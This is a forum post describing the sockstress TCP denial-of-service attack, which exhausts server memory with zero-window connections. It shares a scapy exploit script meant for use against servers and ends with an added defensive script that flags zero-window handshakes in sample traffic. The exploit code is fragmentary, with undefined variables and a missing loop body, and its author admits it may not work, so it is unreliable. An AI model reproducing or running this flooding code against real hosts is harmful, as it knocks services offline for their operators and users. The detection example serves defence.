Here is how it works:
syn -> (4k window)
<- syn+ack (32k window)
ack -> (0 window)
The 0 window size basically says the client's buffer is full, but the server prepares and stores the connection in RAM; basically it waits until the client is ready.
What sockstress does is create loads of connections like that, causing the system to crash (RAM full), until the plug is pulled.
here is a video with a good example of the sockstress exploit:
and a more detailed explanation.
Please refer to this Wikipedia article for more info.
Here is the code for the exploit. It is not extremely powerful, but you don't have to compile or have a VM or anything like that. Anyway, hope you guys like this.
I am not totally sure if it works or not :/ as I can't get many cp/s
Code:
#sockstress exploit with scapy
#coded by fl0urite
#Not totally sure if this works
from threading import Thread
from scapy.all import *
syn=i/TCP(sport=1500, dport=port, flags="S", seq=sequence)
ack=i/TCP(sport=1500, dport=port, flags="A", seq=sequence+1, ack=syn_ack, window=0)
for i in xrange(0,threads):
print "Could only start "+str(i)+" threads."
print "\033[1m\033[5;0;31m"+str(connections/time.clock())+" cps "+str(connections)+" total "
print "Press ^C to stop...\033[0m"
print "\033[5;0;31mWaiting for "+str(threads)+" to finish... \033[0m"
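For the defending side, the handshake pattern described above (SYN, SYN+ACK, then an ACK advertising a 0 window) can be spotted in captured traffic. The following is an added example, not part of the original post: the packet tuples, addresses, the `handshake` helper and the threshold are constructed assumptions.

```python
from collections import defaultdict

def handshake(client, cport, server, ack_window):
    """Build one constructed three-way handshake as (src, sport, dst, dport, flags, window)."""
    return [
        (client, cport, server, 80, "S", 4096),      # syn -> (4k window)
        (server, 80, client, cport, "SA", 32768),    # <- syn+ack (32k window)
        (client, cport, server, 80, "A", ack_window) # ack -> (window under test)
    ]

# Constructed sample traffic: one noisy source and one ordinary client.
PACKETS = []
for port in range(1500, 1504):
    PACKETS += handshake("198.51.100.7", port, "203.0.113.5", 0)
PACKETS += handshake("192.0.2.10", 40000, "203.0.113.5", 29200)
# A zero window later in an established stream is normal flow control.
PACKETS.append(("192.0.2.10", 40000, "203.0.113.5", 80, "A", 0))

def zero_window_handshakes(packets, threshold=3):
    """Return {client_ip: count} for clients that completed at least
    `threshold` handshakes whose final ACK advertised a 0 window."""
    state = {}                # (client, cport, server, sport) -> handshake stage
    hits = defaultdict(int)
    for src, sport, dst, dport, flags, window in packets:
        if flags == "S":
            state[(src, sport, dst, dport)] = "SYN"
        elif flags == "SA":
            key = (dst, dport, src, sport)   # reverse direction of the SYN
            if state.get(key) == "SYN":
                state[key] = "SYNACK"
        elif flags == "A":
            # Only the ACK that completes a tracked handshake is considered;
            # popping the entry means later ACKs on the flow are ignored.
            stage = state.pop((src, sport, dst, dport), None)
            if stage == "SYNACK" and window == 0:
                hits[src] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    for ip, count in zero_window_handshakes(PACKETS).items():
        print(f"{ip}: {count} handshakes completed with a 0 window")
```

The ordinary client is not flagged, because its zero window arrives after the handshake has already completed with a normal window.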